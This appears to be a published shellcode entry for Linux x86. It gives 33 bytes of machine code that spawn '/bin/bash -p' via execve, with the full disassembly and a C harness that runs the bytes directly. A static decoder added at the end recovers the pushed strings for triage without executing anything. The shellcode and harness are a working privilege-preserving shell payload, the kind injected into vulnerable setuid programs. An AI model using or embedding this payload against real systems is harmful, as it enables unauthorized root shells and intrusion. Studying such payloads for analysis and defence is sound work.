
# Title : Linux x86 - execve("/bin/bash","-p",NULL) - 33 bytes
# Published : 2010-05-04
# Author : Jonathan Salwan


/*

Title: 	Linux x86 - execve("/bin/bash", ["/bin/bash", "-p"], NULL) - 33 bytes
Author:	Jonathan Salwan
Mail:	submit@shell-storm.org
Web:	http://www.shell-storm.org

!Database of Shellcodes http://www.shell-storm.org/shellcode/


sh sets (euid, egid) to (uid, gid) if -p not supplied and uid < 100
Read more: http://www.faqs.org/faqs/unix-faq/shell/bash/#ixzz0mzPmJC49

Disassembly of section .text:

08048054 <.text>:
 8048054:	6a 0b                	push   $0xb
 8048056:	58                   	pop    %eax
 8048057:	99                   	cltd   
 8048058:	52                   	push   %edx
 8048059:	66 68 2d 70          	pushw  $0x702d
 804805d:	89 e1                	mov    %esp,%ecx
 804805f:	52                   	push   %edx
 8048060:	6a 68                	push   $0x68
 8048062:	68 2f 62 61 73       	push   $0x7361622f
 8048067:	68 2f 62 69 6e       	push   $0x6e69622f
 804806c:	89 e3                	mov    %esp,%ebx
 804806e:	52                   	push   %edx
 804806f:	51                   	push   %ecx
 8048070:	53                   	push   %ebx
 8048071:	89 e1                	mov    %esp,%ecx
 8048073:	cd 80                	int    $0x80

*/

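#include <stdio.h>
#include <string.h>

/* Opcode bytes from the disassembly above (33 bytes, no NUL bytes). */
char shellcode[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70"
		   "\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61"
		   "\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52"
		   "\x51\x53\x89\xe1\xcd\x80";

int main(int argc, char *argv[])
{
	/* strlen() returns size_t, so print it with %zu */
	fprintf(stdout, "Length: %zu\n", strlen(shellcode));
	(*(void(*)()) shellcode)();
	return 0;
}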
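
For triage, the strings this code assembles on the stack can be recovered statically, without executing it. The following is an added example, not part of the original submission: it replays only the opcodes that appear in the disassembly above on a toy stack. `stack_strings`, `STACK` and the 16-byte output slots are names and limits chosen here.

```c
#include <stdio.h>
#include <string.h>
#define STACK 64

static const unsigned char code[] = {  /* bytes from the listing; decoded, never executed */
    0x6a,0x0b,0x58,0x99,0x52,0x66,0x68,0x2d,0x70,0x89,0xe1,0x52,0x6a,0x68,0x68,0x2f,0x62,
    0x61,0x73,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x52,0x51,0x53,0x89,0xe1,0xcd,0x80
};

/* Replay the listing's opcodes on a zeroed toy stack and copy out the C string at
 * %esp whenever it is saved with mov %esp,reg. Returns the string count, or -1. */
int stack_strings(const unsigned char *c, size_t n, char out[][16], int max)
{
    unsigned char st[STACK + 1] = {0};  /* st[STACK] stays 0 as a terminator */
    size_t sp = STACK, i = 0;
    int found = 0;
    while (i < n && c[i] != 0xcd) {     /* stop decoding at int $imm8 */
        unsigned char imm[4] = {0};
        size_t w = 0, len = 1;          /* bytes pushed, instruction length */
        if (c[i] == 0x6a && i + 2 <= n) {               /* push imm8, sign-extended */
            memset(imm, (c[i + 1] & 0x80) ? 0xff : 0, 4);
            imm[0] = c[i + 1]; w = 4; len = 2;
        } else if (c[i] == 0x68 && i + 5 <= n) {        /* push imm32 */
            memcpy(imm, c + i + 1, 4); w = 4; len = 5;
        } else if (c[i] == 0x66 && i + 4 <= n && c[i + 1] == 0x68) { /* pushw imm16 */
            memcpy(imm, c + i + 2, 2); w = 2; len = 4;
        } else if (c[i] >= 0x50 && c[i] <= 0x57) {      /* push reg, modelled as 0 */
            w = 4;                      /* exact for %edx here; pointers are not tracked */
        } else if (c[i] == 0x58 && sp + 4 <= STACK) {   /* pop %eax */
            sp += 4;
        } else if (c[i] == 0x89 && i + 2 <= n && (c[i + 1] & 0xf8) == 0xe0) {
            len = 2;                                    /* mov %esp,reg */
            if (st[sp] && found < max)
                snprintf(out[found++], 16, "%s", (const char *)&st[sp]);
        } else if (c[i] != 0x99) return -1;             /* 0x99 cltd: no stack effect */
        if (sp < w) return -1;          /* toy stack exhausted */
        sp -= w; i += len;
        memcpy(st + sp, imm, w);
    }
    return found;
}

int main(void)
{
    char s[4][16];
    int k = stack_strings(code, sizeof code, s, 4);
    for (int j = 0; j < k; j++) puts(s[j]);
    return k < 0;
}
```

The third `mov %esp,%ecx` points at the argv pointer array rather than a string, so it yields nothing in this model.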